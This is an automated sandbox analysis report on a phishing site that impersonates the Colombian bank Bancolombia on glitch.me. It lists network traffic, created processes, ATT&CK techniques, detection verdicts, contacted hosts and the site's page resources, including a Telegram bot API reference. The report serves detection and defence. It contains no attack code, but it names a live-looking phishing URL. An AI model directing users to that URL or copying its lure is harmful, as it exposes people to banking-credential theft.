Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: classification engineClassification label: mal80.phis.win@16/72@34/14
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2000,i,8027215415821508008,16941947998853397495,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://bancolombia-seguridad-co.glitch.me/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2000,i,8027215415821508008,16941947998853397495,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: chromecache_69.2.drBinary or memory string: false">Customer stories<span></span></span></a></div><div class="relative container h-72 mb-8 flex justify-center md:hidden"><img alt="Microsoft, Stone, WorldRemit, VMWare, WordPress, Intel, Accenture, Panorays, John Deere, Nokia" loading="lazy" width="350" height="288" decoding="async" data-nimg="1" style="color:transparent" src="https://website-cdn.ipinfo.io/_next/static/media/mobile.b3d06ccc.svg"/></div><div class="hidden space-y-8 md:block 3xl:hidden"><div class="w-full space-y-10 mt-9"></div></div><div class="hidden space-y-8 3xl:flex flex-col items-center"><div class="w-full space-y-10 mt-9" width="2250px" height="auto"></div></div><div class="container md:hidden"><a class="transition rounded-3px outline-none inline-flex
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://bancolombia-seguridad-co.glitch.me/9%VirustotalBrowse
http://bancolombia-seguridad-co.glitch.me/100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
global.px.quantserve.com0%VirustotalBrowse
fp2e7a.wpc.phicdn.net0%VirustotalBrowse
ipinfo.io1%VirustotalBrowse
newsinamerica.com0%VirustotalBrowse
bancolombia-seguridad-co.glitch.me9%VirustotalBrowse
www.google.com0%VirustotalBrowse
d2fashanjl7d9f.cloudfront.net0%VirustotalBrowse
api.ipify.org0%VirustotalBrowse
s-part-0017.t-0009.t-msedge.net0%VirustotalBrowse
s-part-0032.t-0009.t-msedge.net0%VirustotalBrowse
bg.microsoft.map.fastly.net0%VirustotalBrowse
rules.quantcount.com0%VirustotalBrowse
secure.quantserve.com0%VirustotalBrowse
pixel.quantserve.com0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://ampcid.google.com/v1/publisher:getClientId0%URL Reputationsafe
https://stats.g.doubleclick.net/j/collect0%URL Reputationsafe
https://tagassistant.google.com/0%URL Reputationsafe
https://secure.quantserve.com/quant.js0%URL Reputationsafe
https://cct.google/taggy/agent.js0%URL Reputationsafe
https://www.quantcast.com/legal/license0%URL Reputationsafe
https://website-cdn.ipinfo.io/_next/static/media/snowflake.7608b7c5.svg0%VirustotalBrowse
https://website-cdn.ipinfo.io/_next/static/media/ipinfo-main-illustration.9e5f5329.svg0%VirustotalBrowse
https://ipinfo.io/missingauth0%VirustotalBrowse
https://website-cdn.ipinfo.io/_next/static/media/logo-plesk-white.5276a2d7.svg0%VirustotalBrowse
https://api.telegram.org/bot4%VirustotalBrowse
https://www.froala.com/wysiwyg-editor)0%VirustotalBrowse
https://website-cdn.ipinfo.io/_next/static/media/photo-plesk-jan.c2acc0e6.jpeg0%VirustotalBrowse
https://website-cdn.ipinfo.io/_next/static/media/asn-small.77f95094.svg0%VirustotalBrowse
https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css0%VirustotalBrowse
https://api.ipify.org/?format=json0%VirustotalBrowse
https://website-cdn.ipinfo.io/_next/static/media/domains-small.249bd466.svg0%VirustotalBrowse
https://website-cdn.ipinfo.io/_next/static/media/logo-npm-white.37bc2bf6.svg0%VirustotalBrowse
https://website-cdn.ipinfo.io/_next/static/media/privacy-small.854788a7.svg0%VirustotalBrowse
https://www.google.com0%VirustotalBrowse
https://website-cdn.ipinfo.io/_next/static/media/photo-clearbit-alex.70fcf481.jpeg0%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
bancolombia-seguridad-co.glitch.me
3.219.195.73
truetrueunknown
mtmarketing.co
162.214.111.33
truefalse
    unknown
    bg.microsoft.map.fastly.net
    199.232.214.172
    truefalseunknown
    newsinamerica.com
    173.231.197.227
    truefalseunknown
    d2fashanjl7d9f.cloudfront.net
    18.66.102.15
    truefalseunknown
    global.px.quantserve.com
    91.228.74.159
    truefalseunknown
    ipinfo.io
    34.117.59.81
    truefalseunknown
    s-part-0017.t-0009.t-msedge.net
    13.107.246.45
    truefalseunknown
    api.ipify.org
    172.67.74.152
    truefalseunknown
    www.google.com
    172.217.16.196
    truefalseunknown
    fp2e7a.wpc.phicdn.net
    192.229.221.95
    truefalseunknown
    s-part-0032.t-0009.t-msedge.net
    13.107.246.60
    truefalseunknown
    secure.quantserve.com
    unknown
    unknownfalseunknown
    pixel.quantserve.com
    unknown
    unknownfalseunknown
    rules.quantcount.com
    unknown
    unknownfalseunknown
    NameMaliciousAntivirus DetectionReputation
    http://bancolombia-seguridad-co.glitch.me/twoj.jstrue
      unknown
      http://bancolombia-seguridad-co.glitch.me/css/font/OpenSans-Regular.ttftrue
        unknown
        http://bancolombia-seguridad-co.glitch.me/hhhhhh_files/slidemenu.csstrue
          unknown
          https://mtmarketing.co/wp-content/uploads/2021/07/entrevista-adriana-arismendi.jpegfalse
            unknown
            http://bancolombia-seguridad-co.glitch.me/archivos/style.csstrue
              unknown
              http://bancolombia-seguridad-co.glitch.me/css/font/CIBFontSans-Light.ttftrue
                unknown
                http://bancolombia-seguridad-co.glitch.me/true
                  unknown
                  http://bancolombia-seguridad-co.glitch.me/archivos/logo-personas.svgtrue
                    unknown
                    http://bancolombia-seguridad-co.glitch.me/archivos/showLoading.csstrue
                      unknown
                      https://api.ipify.org/?format=jsonfalseunknown
                      http://bancolombia-seguridad-co.glitch.me/hhhhhh_files/bactouch.csstrue
                        unknown
                        http://bancolombia-seguridad-co.glitch.me/hhhhhh_files/ap.js.descargatrue
                          unknown
                          https://newsinamerica.com/pdcc/wp-content/uploads/2024/05/Outlook.jpgfalse
                            unknown
                            http://bancolombia-seguridad-co.glitch.me/archivos/bootstrap.csstrue
                              unknown
                              http://bancolombia-seguridad-co.glitch.me/hhhhhh_files/toolbar.csstrue
                                unknown
                                http://bancolombia-seguridad-co.glitch.me/archivos/ui.csstrue
                                  unknown
                                  https://secure.quantserve.com/quant.jsfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://bancolombia-seguridad-co.glitch.me/hhhhhh_files/bact_listview.csstrue
                                    unknown
                                    http://bancolombia-seguridad-co.glitch.me/favicon.icotrue
                                      unknown
                                      http://bancolombia-seguridad-co.glitch.me/archivos/tlf1.htmltrue
                                        unknown
                                        http://bancolombia-seguridad-co.glitch.me/Casa.csstrue
                                          unknown
                                          http://bancolombia-seguridad-co.glitch.me/archivos/jquery-ui.csstrue
                                            unknown
                                            http://bancolombia-seguridad-co.glitch.me/archivos/ingre.pngtrue
                                              unknown
                                              https://pixel.quantserve.com/pixel;r=495991433;source=gtm;rf=0;a=p-d5x2uDVHd7ALE;url=http%3A%2F%2Fbancolombia-seguridad-co.glitch.me%2F;ns=0;ce=1;qjs=1;qv=fd657345-20240925114642;ref=;d=bancolombia-seguridad-co.glitch.me;dst=1;et=1728836445054;tzo=240;ogl=;ses=f8a615bd-1eec-46c0-bb58-164a7f33c360;uht=2;fpan=1;fpa=P0-1559252703-1728836443566;pbc=;cm=undefined;gdpr=0;mdl=false
                                                unknown
                                                http://bancolombia-seguridad-co.glitch.me/hhhhhh_files/authhub-helper.js.descargatrue
                                                  unknown
                                                  https://ipinfo.io/false
                                                    unknown
                                                    http://bancolombia-seguridad-co.glitch.me/nicepage.csstrue
                                                      unknown
                                                      http://bancolombia-seguridad-co.glitch.me/archivos/icon-user.pngtrue
                                                        unknown
                                                        https://rules.quantcount.com/rules-p-d5x2uDVHd7ALE.jsfalse
                                                          unknown
                                                          http://bancolombia-seguridad-co.glitch.me/hhhhhh_files/footer.csstrue
                                                            unknown
                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://website-cdn.ipinfo.io/_next/static/media/snowflake.7608b7c5.svgchromecache_69.2.drfalseunknown
                                                            https://ipinfo.io/missingauthchromecache_60.2.drfalseunknown
                                                            https://api.telegram.org/botchromecache_70.2.dr, chromecache_85.2.drfalseunknown
                                                            https://website-cdn.ipinfo.io/_next/static/media/ipinfo-main-illustration.9e5f5329.svgchromecache_69.2.drfalseunknown
                                                            https://website-cdn.ipinfo.io/_next/static/media/logo-plesk-white.5276a2d7.svgchromecache_69.2.drfalseunknown
                                                            https://website-cdn.ipinfo.io/_next/static/media/photo-plesk-jan.c2acc0e6.jpegchromecache_69.2.drfalseunknown
                                                            https://ampcid.google.com/v1/publisher:getClientIdchromecache_71.2.dr, chromecache_88.2.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.froala.com/wysiwyg-editor)chromecache_98.2.drfalseunknown
                                                            https://www.google.comchromecache_76.2.dr, chromecache_68.2.drfalseunknown
                                                            https://website-cdn.ipinfo.io/_next/static/media/asn-small.77f95094.svgchromecache_69.2.drfalseunknown
                                                            https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.csschromecache_90.2.dr, chromecache_83.2.dr, chromecache_67.2.dr, chromecache_82.2.dr, chromecache_95.2.dr, chromecache_97.2.dr, chromecache_79.2.dr, chromecache_78.2.dr, chromecache_61.2.dr, chromecache_74.2.dr, chromecache_64.2.dr, chromecache_91.2.dr, chromecache_77.2.dr, chromecache_66.2.drfalseunknown
                                                            https://website-cdn.ipinfo.io/_next/static/media/domains-small.249bd466.svgchromecache_69.2.drfalseunknown
                                                            https://website-cdn.ipinfo.io/_next/static/media/google-cloud.17488aed.svgchromecache_69.2.drfalse
                                                              unknown
                                                              https://website-cdn.ipinfo.io/_next/static/media/logo-npm-white.37bc2bf6.svgchromecache_69.2.drfalseunknown
                                                              https://stats.g.doubleclick.net/j/collectchromecache_88.2.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://website-cdn.ipinfo.io/_next/static/media/photo-clearbit-alex.70fcf481.jpegchromecache_69.2.drfalseunknown
                                                              https://website-cdn.ipinfo.io/_next/static/media/privacy-small.854788a7.svgchromecache_69.2.drfalseunknown
                                                              https://website-cdn.ipinfo.io/_next/static/media/mobile.b3d06ccc.svgchromecache_69.2.drfalse
                                                                unknown
                                                                https://website-cdn.ipinfo.io/_next/static/media/splunk.a71e22c9.svgchromecache_69.2.drfalse
                                                                  unknown
                                                                  https://website-cdn.ipinfo.io/_next/static/media/datadog.01d809ee.svgchromecache_69.2.drfalse
                                                                    unknown
                                                                    https://website-cdn.ipinfo.io/_next/static/media/logo-clearbit-white.dedf4224.svgchromecache_69.2.drfalse
                                                                      unknown
                                                                      https://website-cdn.ipinfo.io/_next/static/media/company-small.e5cfbec7.svgchromecache_69.2.drfalse
                                                                        unknown
                                                                        https://website-cdn.ipinfo.io/_next/static/media/database-download-small.053da0c0.svgchromecache_69.2.drfalse
                                                                          unknown
                                                                          https://website-cdn.ipinfo.io/_next/static/media/photo-npm-laurie.30cd3e0e.jpegchromecache_69.2.drfalse
                                                                            unknown
                                                                            https://website-cdn.ipinfo.io/_next/static/media/paloalto.0919c3d7.svgchromecache_69.2.drfalse
                                                                              unknown
                                                                              https://api.ipify.org?format=jsonchromecache_59.2.drfalse
                                                                                unknown
                                                                                https://glitch.comchromecache_90.2.dr, chromecache_83.2.dr, chromecache_67.2.dr, chromecache_82.2.dr, chromecache_95.2.dr, chromecache_97.2.dr, chromecache_79.2.dr, chromecache_78.2.dr, chromecache_61.2.dr, chromecache_74.2.dr, chromecache_64.2.dr, chromecache_91.2.dr, chromecache_77.2.dr, chromecache_66.2.drfalse
                                                                                  unknown
                                                                                  https://help.glitch.com/chromecache_90.2.dr, chromecache_83.2.dr, chromecache_67.2.dr, chromecache_82.2.dr, chromecache_95.2.dr, chromecache_97.2.dr, chromecache_79.2.dr, chromecache_78.2.dr, chromecache_61.2.dr, chromecache_74.2.dr, chromecache_64.2.dr, chromecache_91.2.dr, chromecache_77.2.dr, chromecache_66.2.drfalse
                                                                                    unknown
                                                                                    https://tagassistant.google.com/chromecache_71.2.dr, chromecache_88.2.drfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://website-cdn.ipinfo.io/_next/static/media/carrier-small.6d72c73d.svgchromecache_69.2.drfalse
                                                                                      unknown
                                                                                      https://website-cdn.ipinfo.io/_next/static/media/abuse-small.ef56e2d8.svgchromecache_69.2.drfalse
                                                                                        unknown
                                                                                        https://cct.google/taggy/agent.jschromecache_76.2.dr, chromecache_68.2.drfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://ipinfo.iochromecache_59.2.drfalse
                                                                                          unknown
                                                                                          https://website-cdn.ipinfo.io/_next/static/media/geolocation-small.0037d36c.svgchromecache_69.2.drfalse
                                                                                            unknown
                                                                                            https://website-cdn.ipinfo.io/_next/static/media/zapier.a1a375f4.svgchromecache_69.2.drfalse
                                                                                              unknown
                                                                                              https://website-cdn.ipinfo.io/_next/static/media/whois-small.7868d282.svgchromecache_69.2.drfalse
                                                                                                unknown
                                                                                                https://website-cdn.ipinfo.io/_next/static/media/icon-menu.1b6dca09.svgchromecache_69.2.drfalse
                                                                                                  unknown
                                                                                                  https://www.google.com/ads/ga-audienceschromecache_71.2.dr, chromecache_88.2.drfalse
                                                                                                    unknown
                                                                                                    https://website-cdn.ipinfo.io/_next/static/media/heroku.7b181a55.svgchromecache_69.2.drfalse
                                                                                                      unknown
                                                                                                      https://www.google.%/ads/ga-audienceschromecache_71.2.dr, chromecache_88.2.drfalse
                                                                                                        unknown
                                                                                                        https://td.doubleclick.netchromecache_76.2.dr, chromecache_68.2.drfalse
                                                                                                          unknown
                                                                                                          https://website-cdn.ipinfo.io/_next/static/media/blue_check.d118dbca.svgchromecache_69.2.drfalse
                                                                                                            unknown
                                                                                                            https://www.quantcast.com/legal/licensechromecache_73.2.dr, chromecache_93.2.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://website-cdn.ipinfo.io/_next/static/media/ranges-small.fd2dafde.svgchromecache_69.2.drfalse
                                                                                                              unknown
                                                                                                              https://website-cdn.ipinfo.io/_next/static/media/api-access.d4d3b4b8.svgchromecache_69.2.drfalse
                                                                                                                unknown
                                                                                                                https://website-cdn.ipinfo.io/_next/static/media/logo-positive.0a4ba892.svgchromecache_69.2.drfalse
                                                                                                                  unknown
                                                                                                                  https://cdn.glitch.com/d7f4f279-e13b-4330-8422-00b2d9211424%2FGlitch-Error-Rainbow-Mug-hires.png?v=1chromecache_90.2.dr, chromecache_83.2.dr, chromecache_67.2.dr, chromecache_82.2.dr, chromecache_95.2.dr, chromecache_97.2.dr, chromecache_79.2.dr, chromecache_78.2.dr, chromecache_61.2.dr, chromecache_74.2.dr, chromecache_64.2.dr, chromecache_91.2.dr, chromecache_77.2.dr, chromecache_66.2.drfalse
                                                                                                                    unknown
                                                                                                                    https://froala.com/wysiwyg-editor/terms/chromecache_98.2.drfalse
                                                                                                                      unknown
                                                                                                                      https://website-cdn.ipinfo.iochromecache_69.2.drfalse
                                                                                                                        unknown
                                                                                                                        https://website-cdn.ipinfo.io/_next/static/media/wordpress.dd4ede2f.svgchromecache_69.2.drfalse
                                                                                                                          unknown
                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs
                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          3.219.195.73
                                                                                                                          bancolombia-seguridad-co.glitch.meUnited States
                                                                                                                          14618AMAZON-AESUStrue
                                                                                                                          91.228.74.166
                                                                                                                          unknownUnited Kingdom
                                                                                                                          27281QUANTCASTUSfalse
                                                                                                                          91.228.74.200
                                                                                                                          unknownUnited Kingdom
                                                                                                                          27281QUANTCASTUSfalse
                                                                                                                          18.66.102.15
                                                                                                                          d2fashanjl7d9f.cloudfront.netUnited States
                                                                                                                          3MIT-GATEWAYSUSfalse
                                                                                                                          104.26.13.205
                                                                                                                          unknownUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          173.231.197.227
                                                                                                                          newsinamerica.comUnited States
                                                                                                                          22611IMH-WESTUSfalse
                                                                                                                          162.214.111.33
                                                                                                                          mtmarketing.coUnited States
                                                                                                                          46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                          18.66.102.66
                                                                                                                          unknownUnited States
                                                                                                                          3MIT-GATEWAYSUSfalse
                                                                                                                          34.117.59.81
                                                                                                                          ipinfo.ioUnited States
                                                                                                                          139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                          239.255.255.250
                                                                                                                          unknownReserved
                                                                                                                          unknownunknownfalse
                                                                                                                          91.228.74.159
                                                                                                                          global.px.quantserve.comUnited Kingdom
                                                                                                                          27281QUANTCASTUSfalse
                                                                                                                          172.217.16.196
                                                                                                                          www.google.comUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          172.67.74.152
                                                                                                                          api.ipify.orgUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          IP
                                                                                                                          192.168.2.4
                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1532604
                                                                                                                          Start date and time:2024-10-13 18:19:41 +02:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 3m 24s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:browseurl.jbs
                                                                                                                          Sample URL:http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:8
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal80.phis.win@16/72@34/14
                                                                                                                          EGA Information:Failed
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          • Number of executed functions: 0
                                                                                                                          • Number of non-executed functions: 0
                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
